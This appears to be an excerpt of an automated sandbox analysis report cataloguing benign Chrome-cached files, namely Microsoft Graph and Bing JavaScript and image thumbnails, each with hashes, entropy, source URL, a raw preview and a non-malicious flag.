                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (65188)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):77391
                                                                                                    Entropy (8bit):5.274343929479743
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:986uWt+5MaZ+sefChTFh7g58k0D5ChKt/w976PZM+dfWXNWfGh22m9oCcQhS9Chx:W6uWy/fW8k0kcPySW9mFbiIZ
                                                                                                    MD5:13B147A683AF38608F9C22EE9D66A832
                                                                                                    SHA1:F9291CD3A214674A186F4BE85CDC655A6B3A31FA
                                                                                                    SHA-256:F0B2216568BB538A00EE14C13AD49EA15B1653044A219A698889610EDCF9BF05
                                                                                                    SHA-512:1C4DEB1CF689906DD026C6FE7383CFAC8F1BEABAC05DC65309A35F60CB70EBED45D265351B8B6D35382C5136815E0809772A48E242608E309BECB9B7078CAB17
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:/**.* -------------------------------------------------------------------------------------------.* Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License..* See License in the project root for license information..* -------------------------------------------------------------------------------------------.*/.var MicrosoftGraph=function(e){"use strict";function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function r(e){return r="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},r(e)}function n(e){var t=function(e,t){if("object"!==r(e)||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var i=n.call(e,t||"default");if("object"!==r(i))return i;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)}(e,"st
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 72x72, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):7.204807905949738
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:EGKgTY89p7NsdzFXC0KslX0XuFN46p6dMUw:EbgTY8tszFxKslX08qGEM
                                                                                                    MD5:168D1A8F06909C67D7A539476936AF3A
                                                                                                    SHA1:C9E36ABE53804CFC3377FCFF985AB7A5D4EAE3D7
                                                                                                    SHA-256:D10C34A6E21BC3636A4D4F5DF8F8DB6A239A8C8DF7A645B313A23B1569F3F50C
                                                                                                    SHA-512:285020DDE9D8EF4113A0B1691961D43BB1DE0E9A2AC26EE3B65B996F8ED9862AE5FD16AF7F117AE7EE294BBCE261E9A068263432DCF2A897621D98D243864B9B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.bing.com/th?id=OSAAS.C024F572C62792AD783C742C98372386&w=72&h=72&c=17&rs=1&o=6&pid=TechQna
                                                                                                    Preview:......JFIF...................................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............H.H.."...............................................0....r.45.S..\.....G./6z.ia..^.`..=.......................................'JL...\.................................a..1..!03Q."#2RrAeq........?..<.g...r.g...r.|.g..h.E.S.i.D..#.....mk ..u..!..}.9V.;.3.m. .C$.,......W.;:.B]..I.g..8.5.E....0d.3..q.=b{...Z.62q.!.)JDF1..}.U.N..*ZE....,..?n..l....FE........~....}.?./<N.;..M...e....L./.D..d....1...{iDb8D}.He.W..dm...K..Q..#..l.f..Y.ck.~...C.._. ..9......j..l.\.....0.s. p.lI}.JM.$Xmhy..I+.#....r.....&.)..h..B$x..y..Go..j..Zf..Y...K....E.].....a.......kW....V.O.Bq.......V.X...$.......B.%.!YB5I(.?O....u:..uf.D...N....z..c.?......$........jU}cQ..:...F#...:e=V..vV.I.K:.`:O.....Zd.QZ......'....s.q.9.8............................ ..0q........?..m[mIf........b.${........................... a....0........?.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 80x80, components 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):980
                                                                                                    Entropy (8bit):7.161791713771241
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ZptTpn7mQyFJI6q6yj0fYxI6R/zvRb3ZsGm+N:ZptVi3jNYofYSkt39m+N
                                                                                                    MD5:17C5569654A0A14906AC404C109B3E30
                                                                                                    SHA1:EB6A9093E2A0B0BD65682B7226EA6E4933F016A2
                                                                                                    SHA-256:AF8A2CBA0109ABA054F723ECDDEC97FCA8012B43D5831A5E61355AB0B1E39126
                                                                                                    SHA-512:B2C125331B65165A328CC705CCC7BC9C4FD79A440BAF214DDB19A667ABA97DDF160D6D939CD05389E06EFAA418C3AE63261046A70356A0A8EE906277C6BB1C4A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:......JFIF...................................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............P.P..".......................................................RbM....*.Y\).p..Pu.w]w..1R.......>|_...}YNB.ex..........................................H.. .b..+.5..S_O................................!1..."#AQaq..@Bd...........?..{|..rNX,...y3...A..>S.gq.......g.>.x...;.....%..?.9;"Sfw........j...Z...o.5...H...H.....6..........b..Yv...ZNOS..`83..l..{..m..F..S...:i..'..Ry1......LGl......*..#*.....6....B.q..@+.....&_..=...!.V.Fl.p.#.LP .BN;...Oi.......2 ...3.ffj.m=.}.9.{..r.i.t.......^..il.#..k...`|D......K...}...mb#Y....._...q.N.p....9.R>.o....N.4.....$...i}U.zc.].../.t.......>@..A.......?...!.......................1!. "AQ.........?.....b.1Cf.1J7d.b....S.K....*..C...~.B1....7....V..B..S.C.n....'..."........................!"A. 1Q.........?......n._.dyI$bE..R...$....$.......E.....
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 60 x 28, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1045
                                                                                                    Entropy (8bit):7.812007487462295
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:2YvL3J/eQWCXbwIoGryAFXt3jwRDa9W3TH:Rv1NHUIbrzU3TH
                                                                                                    MD5:2AA8CAB3D7B05D1540A69E6DA11C916B
                                                                                                    SHA1:4F7B7A5776B3806E0195245C82E476B2CB943B14
                                                                                                    SHA-256:BE40B55ED2C02CA68A1527E8B50CB949FFF17EC444504F9ABCE98C97EBAD1738
                                                                                                    SHA-512:FEC6CD89DA1CC4630A229567101F83D979860F6CDF34FEA00174052FDEE93F00F8F0AA489C565F6CD1BCEE3124DFCB1DCE9418FBA7B3983EF6F6946C8689B241
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR...<.........=P.D....IDATx..?LSA.......J(......YcY\.......%&n.XD....X...N..Q...US.IL...z.?.?.}..I.......~w....Jv..Q..........8M...6..%..X.u....\.f.X..>u.d..E.+b6.P4.].........W.}t..jc......^.....p.).".U.H...y...i...Fz......a`.,Gr.8XP.K3@./.U...+........d`.;...,...{.U.s.:...<O......~..'.8#{...5....9...../."S.....9...Nr<=.u57.?G.a.x......}.....6n=W.3}...(.QV....y..R..G`.J...5....h.R.Z).:8.../5.%&..9..M...jQ.V?..[-E...........-....1.[!....)Ml].i.I. 8.).A.aiE./0.C'.P...v.....e(.....;...E...i..D....ea.#.3)..h..&,...Y..$-G......G...IY..T...mP.5?l...5w..t....m.O6........o(...f.k..Q5.....A.....S.......s.D..R.....^..{o..~..a...X....Z.I..Z.*/m...$....\..2O.$%.3;....)..m...}h.l....&.OPq.k......T.:q.E.p"".....{V.$/4a9.G.4.E..1..{... Y.....:3.9.&m..Z...k.'........v.\.e...y+.L..%..{..8..E..R&....[I.P......0.u/#.......f......e....H'.v..qp..J.w..}e.*.,..@....7Sjd.$aW......o.'R...L.#...0....K..rT`>>......Y2..,...!.......T
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1017 x 706, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):372407
                                                                                                    Entropy (8bit):7.9920868023509675
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:6144:Qua8gWRQXRaGDBt/Qc8ABKmSzu/8YbOHPiyjcXLVzXDJImOdeEd0YufcqoTU3Xw1:QuaW0bL/QcdBaxjc7xXDOmOdee0DcqU/
                                                                                                    MD5:1B4C66938347FF70F6D2FA1173D0C09B
                                                                                                    SHA1:8766438A8E7EE0E068BABA0042B0D97C7667CAE4
                                                                                                    SHA-256:B59D05AA36BA301347E8E8D711A42452E925F6875ACE1409B056AD2B759C9317
                                                                                                    SHA-512:C9C2733F7C0DCA56B13E9F08CFFCFE0BD836F97D4D8B28EA1BA57896B9B2342A570D1653059BDED922024C10F8842C85504BAFD650CABA52C9DBF380078CBDF7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR.....................pHYs.........&.:4....sRGB.........gAMA......a....LIDATx..[.m[r.V5.\..o.....O...>}w..6.` ..lC0.....F..@..(..<.C.).....!..)....<$J"E....D...0...M.}.n.....9*sT.WUs..6....Q...Zk.9..5... .4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I..^b.4.7.q....W........F.mL.~.G..Q..$.X...............,..q.w...W..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (14334), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):14334
                                                                                                    Entropy (8bit):5.214511072778415
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:4j2fQmlfpG3olyemLINsiBp+t9o8dQUwLgq:4j2omTq9/INsie9o8GRLD
                                                                                                    MD5:6DEB575ED015BA9F359671380474EF88
                                                                                                    SHA1:0F8F36FA0B0CBC56FA091DBD60D918A0C1F2C99A
                                                                                                    SHA-256:F015ED4A8BF649FBE3333F1B9E3214AB9CD495BBDD6387812ED79039F2DDD394
                                                                                                    SHA-512:D3ACE5A16CBA1245128B38EF256EC2420A44C929830540DCE0F8539FF45DCF833257A82F132C4316D9ACFA907823741AE4146A67C99242B0EE1B1EC9471E40E8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/D482-gsMvFb6CR29YNkYoMHyyZo.js
                                                                                                    Preview:var tabcontrol;(function(n){function ot(){return n.tabErrorMsg}function st(t){n.tabErrorMsg=t}function w(){return n.tabs||(n.tabs=[]),n.tabs}function ht(){n.tabs=[]}function k(n){n&&!ct(n)&&Lib.CssClass.add(n,"tab-disable")}function d(n){n&&Lib.CssClass.remove(n,"tab-disable")}function g(n){return Lib.CssClass.contains(n,"tab-active")}function ct(n){return n&&Lib.CssClass.contains(n,"tab-disable")}function f(n){return _ge(t(n,"content"))}function r(n){return t(n,"appns")}function u(n){return t(n,"k")}function t(n,t,i){if(i===void 0&&(i=null),!n)return null;var r="data-"+t;return i===null?n.getAttribute(r):(n.setAttribute(r,i),i)}function e(n,i){return i===void 0&&(i=null),i===null?parseInt(t(n,v),10):(t(n,v,i.toString()),i)}function lt(n,t,i){i===void 0&&(i=null);t.style.opacity="0";sb_st(function(){Lib.CssClass.add(t,"tab-hide");n.style.opacity="1";Lib.CssClass.remove(n,"tab-hide");i&&i()},0);Log.Log("Show","Tab","TabControl",!1,"AppNS",r(n),"K",u(n),"Category","CommonControls");Log.L
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 80x80, components 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1562
                                                                                                    Entropy (8bit):7.599886494775448
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Z9CqaFBxpEzVoEYQsbkvQDBsEAvaaZWWnS7Lz36L1vtHnynuQai9FIAyduzTP:ZlqvEO1bBsEnQNOH34vtHnynuJi9Ffhb
                                                                                                    MD5:D5A08251482AD1EDF7EBA5A8E55B1C2F
                                                                                                    SHA1:C9B9B92ACA81A644465EEA2DA65C5B965B7FC5F3
                                                                                                    SHA-256:D87DA36806D010E784E81D1C4C64AC2D82549455EF581144117D3C02C7FF6870
                                                                                                    SHA-512:64869236ED65CC035409BD69E7F1B9EDDD1AB24BDDD75E9CE41AA017C9AB315F6B8E44392E3D46AD9A7783F1EAD50DE6E94305501DAB73C8FD3AFB9BE1152280
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:......JFIF...................................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............P.P..".................................................K........mf..p-.Y.E..^w...do.7.....M.f.[^{>...b...?.-^...=..5a..Q.. ...5.. gY^..........................................wiF..4*s..1$..Bl.*.&..IL...."7.......;..........................!1Aq"Q....#2ab. 45Br..CDRSs............?..._Z.D.\...3.T.aq+.io.'# ..k.7!.....j.....\.....z...$j^GTA..._m....fy...+...i .H...c.9n.o...H]d...pe9........b....IP::.....YR...C.".n....../!...'%.k......RR.U.+.....}....&.$Oe..X....>...j...F).om .'.V..D...?c..a..R"G...GSR...p\.>..M.$..H..q.R...#.1..........Q..5....`.l..:.>ye..Y.........MX..............n.O....k..G.U..R..{.V .@t...<.mt.5....<.nQM.5a..a..{|.Q...k..%........[F3.n..?.j..*.......U..+..h.x.."C.f.f..Z.v.b........T...;.Y..h....y........xc..X$...U........S..O...'...<...'p`......j....2.;Dos..SR.u..l..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (924), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):924
                                                                                                    Entropy (8bit):5.195012633286773
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:rVnoyfEzPHQFvG99rynERM93YGxSN+/sKE3p5vyNAM:rVnoyCkKgnCM9eBKE55vyj
                                                                                                    MD5:47442E8D5838BAAA640A856F98E40DC6
                                                                                                    SHA1:54C60CAD77926723975B92D09FE79D7BEFF58D99
                                                                                                    SHA-256:15ED1579BCCF1571A7D8B888226E9FE455ACA5628684419D1A18F7CDA68AF89E
                                                                                                    SHA-512:87C849283248BAF779FAAB7BDE1077A39274DA88BEA3A6F8E1513CB8DCD24A8C465BF431AEE9D655B4E4802E62564D020F0BB1271FB331074D2EC62FC8D08F63
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))};(function(){function n(n){for(var r=[],i=1;i<arguments.length;i++)r[i-1]=arguments[i]}function u(n,t){for(var u=[],r=2;r<arguments.length;r++)u[r-2]=arguments[r];typeof Log!="undefined"&&Log&&Log.Log&&Log.Log.apply(Log,__spreadArray([i,n,t,!1],u,!1))}var t="acclink",i="acclink";if(sj_evt){sj_evt.bind("acclink:updated",function(t){if(t&&t.length>=2){var i=t[1],f=i.IsTenantAllowAccountLink,e=i.HasLinkedAccount;n("fire loadIdLinkIcon with acclink:updated ",t[1]);r(f,e);u("loadIdLinkIcon","load IdLinkIcon","params",t[1])}},1);function r(t,i){var r=_ge("id_linkicon");r&&(t&&i?(r.style.display="inline-block",n("show id link icon")):(r.style.display="none",n("hide id link icon")))}}})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):100176
                                                                                                    Entropy (8bit):5.261353322138495
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:52lqZD9U3kgqxpi2agfBDXykUUYDgXftll8bff1x71:5xZpskg6+g3UMvmHB
                                                                                                    MD5:DD5901E75623C17AD820EDD2765E4A08
                                                                                                    SHA1:61A92693904C69F32A7B058387EB9598D6456445
                                                                                                    SHA-256:AC893DA9C4476D0DF6B464F699DB3396AB4B22627A21C2E9C2EC6F5CF713D9EB
                                                                                                    SHA-512:498E01E586F2A8180BA56E102587291E9A1F319EDD583A8560ED1802A90F755B06A35ED670241D183B9A3F85AF269ACE732C280EF4FAF944F29C1B1EE26B102B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var AutoSuggest,sa_storage,EventKeyCodes,__extends,Bing,sa_inst;(function(n){var t;(function(n){var t,i,r,u,f,e;(function(n){n.User="SRCHHPGUSR"})(t=n.CookieNames||(n.CookieNames={})),function(n){n.AutoSuggest="AS"}(i=n.CrumbNames||(n.CrumbNames={})),function(n){n.CursorPosition="cp";n.ConversationId="cvid";n.SuggestionCount="sc";n.PartialQuery="pq";n.SuggestionPosition="sp";n.SuggestionType="qs";n.PreviewPaneSuggestionType="qsc";n.SkipValue="sk";n.PreviewPaneSkipValue="skc";n.Ghosting="ghc";n.Css="css";n.Count="count";n.DataSet="ds";n.SessionId="sid";n.TimeStamp="qt";n.Query="q";n.ImpressionGuid="ig";n.QFQuery="qry";n.BaseQuery="bq";n.FormCode="form";n.HashedMuid="nclid";n.RequestElToken="elvr";n.ElTokenValue="elv";n.AppId="appid";n.History="history";n.NoHistory="nohs";n.ApiTextDecoration="textdecorations";n.ClientId="clientid";n.Market="mkt";n.Scope="scope";n.CountryCode="cc";n.HomeGeographicRegion="hgr";n.SetLang="setlang";n.ZeroInputSerp="zis";n.GhShown="ghsh";n.GhAccepted="ghacc";
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 84 x 12, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1255
                                                                                                    Entropy (8bit):7.72475662763531
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:fx/GuCVKFPPytC3f3s7TxRwJREUccN+hJ9D3pSTYJmda/hRPbkGcrBvhuL3OT9uc:5/GtkFPqtif87TxRwJRBccN+h9Jmdapg
                                                                                                    MD5:3E1CD2137A9811B978568392430CCC51
                                                                                                    SHA1:8D204356B7D8CD228FAE858236237374836B3703
                                                                                                    SHA-256:5DEF3FAF3461305079A86BB0306F487462C2C96EEB4E68F476163AD4DC8EBE80
                                                                                                    SHA-512:AFB622767F578E2C40537B445BFEC837D969E185D3DAC37F14057512B1B36CC133DA6F69D6A45FF2B7094D22C1879511E9EEF7AF45952428B79A5B88DEF2B08A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.bing.com/th?id=OJ.1JUQHolalj0A2w&pid=news&w=84&h=12&rs=2
                                                                                                    Preview:.PNG........IHDR...T............[....sRGB.........gAMA......a.....pHYs..........o.d...|IDATXG.y..E...oV.y...j.x.E..%.J."...h$.%..VP.P.x..H......."$."ea.F.)..Ei.i>..~sX~o.G D.x.....5[A5pI....]m.Z..z!J.>....6>.T:..'..i[.yT.E...B..A..(....b...8..+m@u.?<.....:.P.<{.Tn...l{......X....P...\X.. ..w...`...&p..........)..*....M..X./..6.{!..~..#....8..............Cp.~..h.'.y\.r...5`.$P..Z.'.:{.........P.8......;h.}.}8v/8.+h.S.s..k.._.*p..a..|.^~.........l..>/........`t.q.\....o...=<_....a2...A.!:.._.aP.&.......S.5.A~[Y.:.^.tn..,".U..4....T..:.~.o+.........c....v.[p.....`..=.='=.d~.ye9...m@.J...5.....Y.....]._B.zV..=..t.).....m6...S.z...j.=...4V|k..i>o...)..A.iP...3a.hD3....G8...s...!..#.....\.e.Zg}.....IL..0...}..^...4......f.?.*R.6....b...a...Z..7.T5..f...X........#3.y.e.Tyo.....Q...AV[M..f.E...N..x.Y.\...A..&p..|............S@.2....`......E..f...U8VY/Mc..h.......#.,.`..58.57j.eBt.ky...p.W.y...f.%.........qY..9.7<.....W..(#...t...`.Yk...D.`......).
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (891), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):891
                                                                                                    Entropy (8bit):5.1332488883366585
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:2QG5MCVFmMCBTotKMCWqEZWMCUHK09nzEIzGln:GbGb+Eb5EgbCr9nz+ln
                                                                                                    MD5:02B0B245D09DC56BBE4F1A9F1425AC35
                                                                                                    SHA1:868259C7DC5175A9CC1E2EC835F3D9B4BD3F5673
                                                                                                    SHA-256:62991181637343332D7B105A605AB69D70D1256092355CFC4359BEE7BDBFB9C6
                                                                                                    SHA-512:CBB43000A142807FF1BB3BFAC715CEF1240233117C728F357C824CE65B06BE493DF2306C7B03598817F09B02E9E36EC52314F88467679C5BEF3EE1504A10C7E6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/hoJZx9xRdanMHi7INfPZtL0_VnM.js
                                                                                                    Preview:(function(){function e(){var t,r;n&&(n.value.length>0?(t=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||t===void 0?void 0:t.add(sj_b,i):(r=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||r===void 0?void 0:r.remove(sj_b,i))}function o(t){var e,o;n.value="";n.innerText="";u&&f&&(u.innerText="",f.classList.remove("nudgeVisible"));(e=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||e===void 0?void 0:e.remove(sj_b,i);sj_log("CI.XButton","Clicked","1");r&&((o=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||o===void 0?void 0:o.add(r,"b_focus"));n.focus();n.click();t&&(t.preventDefault(),t.stopPropagation())}var r=_ge("b_header"),n=_ge("sb_form_q"),t=_ge("sb_clt"),u=_qs(".qfc.b_searchbox .ghost"),f=_qs(".qfc.b_searchbox .nudge"),i="b_sbText";n&&t&&(sj_be(t,"click",o),sj_be(t,"keydown",function(n){var t=n.code||n.key;t==="Enter"&&o(n)}),sj_be(n,"keyup",e),e())})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (2683), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):2683
                                                                                                    Entropy (8bit):5.285209446790883
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:5sksi0wg1S0h195DlYt/5ZS/wAtKciZIgDa4V8ahff/Z/92zBDZDNJC0x0M:yk1g1zbed3SBkdZ9ZGVFNJCRM
                                                                                                    MD5:FB797698EF041DD693AEE90FB9C13C7E
                                                                                                    SHA1:394194F8DD058927314D41E065961B476084F724
                                                                                                    SHA-256:795E9290718EB62A1FB00646DC738F6A6B715B1171DD54A3D2DEFA013A74F3DA
                                                                                                    SHA-512:E03C4AB727567BE95B349B971E29CFFB3890CFB1A1DDF997B34B9D69154294A00A5112F4FFCA4DF4E26BBF96AFA75E5943E965EDC8F8E21035ED2EF30B7688D8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/OUGU-N0FiScxTUHgZZYbR2CE9yQ.js
                                                                                                    Preview:var IPv6Tests;(function(n){function c(t){var r,c,o,l,f,s,i,a,v;try{if(y(),t==null||t.length==0)return;if(r=sj_cook.get(n.ipv6testcookie,n.ipv6testcrumb),r!=null&&r=="1"&&!u)return;if(c=sj_cook.get(n.ipv6testcookie,n.iptypecrumb),r!=null&&c&&u&&(o=Number(r),l=(new Date).getTime(),!window.isNaN(o)&&o>l))return;if(f=_d.getElementsByTagName("head")[0],!f)return;if(s="ipV6TestScript"+t,i=sj_ce("script",s),i.type="text/javascript",i.async=!0,i.onerror=function(){Log.Log("ipv6test","IPv6Test Dom_ "+t,"IPv6TestError",!1,"Error","JSONP call resulted in error.")},a=_ge(s),a&&f)return;f.insertBefore(i,f.firstChild);i.setAttribute("src",_w.location.protocol+"//"+t+".bing.com/ipv6test/test");e&&p();v=u?(new Date).getTime()+h:"1";sj_cook.set(n.ipv6testcookie,n.ipv6testcrumb,v.toString(),!1)}catch(w){Log.Log("ipv6test","Dom_ "+t,"IPv6TestError",!1,"Error","Failed to make JSONP call. Exception - "+w.message)}}function l(t){if(!t){Log.Log("ipv6test","IPv6TestResponseError","IPv6TestError",!1,"Error","G
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (14140), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):14140
                                                                                                    Entropy (8bit):5.176202386654817
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:X7zKStQ3Z6NFIvSAqwXpqsp6ItMbHOOUq8oAXz5hzgOxqRgfitvD6TryoTL459zE:PK2IqASsp8bHOlvMBDg++Mtu
                                                                                                    MD5:8F34B56ECA56F9A32B8B953FF2F9005B
                                                                                                    SHA1:32BF772D1026867833E2DF658A2E4AABDBA9BF78
                                                                                                    SHA-256:E2D3D9EDEB47DA532DF101E2FE0935890F7E52ACB204340BD78BF1CF4B4C4441
                                                                                                    SHA-512:6952E2203F672A26FBD64E1A3ABDC3C1D59DA2A5DC27FEFBC59BDF95A84359FF2EF200CDF7A22FD187C031AF31DB349D36E240ECE770EFFD3B5D46718794C64D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/Mr93LRAmhngz4t9lii5Kq9upv3g.js
                                                                                                    Preview:!function(n){"function"==typeof define&&define.amd?define(n):n()}(function(){function t(n,t){for(var i in t)n[i]=t[i];return n}function g(n){var t=n.parentNode;t&&t.removeChild(n)}function a(n,t,r){var o,s,f,e={};for(f in t)"key"==f?o=t[f]:"ref"==f?s=t[f]:e[f]=t[f];if(arguments.length>2&&(e.children=arguments.length>3?i.call(arguments,2):r),"function"==typeof n&&null!=n.defaultProps)for(f in n.defaultProps)void 0===e[f]&&(e[f]=n.defaultProps[f]);return u(n,e,o,s,null)}function u(t,i,r,u,f){var e={type:t,props:i,key:r,ref:u,__k:null,__:null,__b:0,__e:null,__d:void 0,__c:null,__h:null,constructor:void 0,__v:null==f?++p:f};return null==f&&null!=n.vnode&&n.vnode(e),e}function f(n){return n.children}function e(n,t){this.props=n;this.context=t}function o(n,t){if(null==t)return n.__?o(n.__,n.__.__k.indexOf(n)+1):null;for(var i;t<n.__k.length;t++)if(null!=(i=n.__k[t])&&null!=i.__e)return i.__e;return"function"==typeof n.type?o(n):null}function nt(n){var t,i;if(null!=(n=n.__)&&null!=n.__c){for(
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 2501 x 831, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):871456
                                                                                                    Entropy (8bit):7.99321885800314
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:12288:0gKYAG/kgSHCI1lCaBDevD+ht1s996/cZoCCejkEnK3eXJdcKyMn5A+dZLw:rQR/1l9evDGdEZRzgAJdB/DdZE
                                                                                                    MD5:46B510EC8A77F53E8C201F8779D69E42
                                                                                                    SHA1:A21718B5BA16FF1BC10C43FFE9F4823D5EB414B0
                                                                                                    SHA-256:D7315CEF7F382EB88B09A82EB3D5F13564105D5CE8413888963699E4BB523895
                                                                                                    SHA-512:17E5C09882E8700C731AFE807F98D30658058CB9AC74A60CD291C37F0242863A2FB524829D708867529A368463D5949097D25DA5C6E6CF87DE0F9B125CA614AC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/m365-copilot-centric-value-commercial-46b510ec8a.png
                                                                                                    Preview:.PNG........IHDR.......?.......(.....pHYs.................sRGB.........gAMA......a...K.IDATx.......y..>..}.].n-.R.$.%K.,#K.e....6.6.m.a9....0..=}.i...9s.9}.....{`.6....h....j......ZJ.Rm......%3&#3.'.}oI6.H.._.w.\"##"#.'..<".......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1034 x 719, 8-bit/color RGBA, non-interlaced
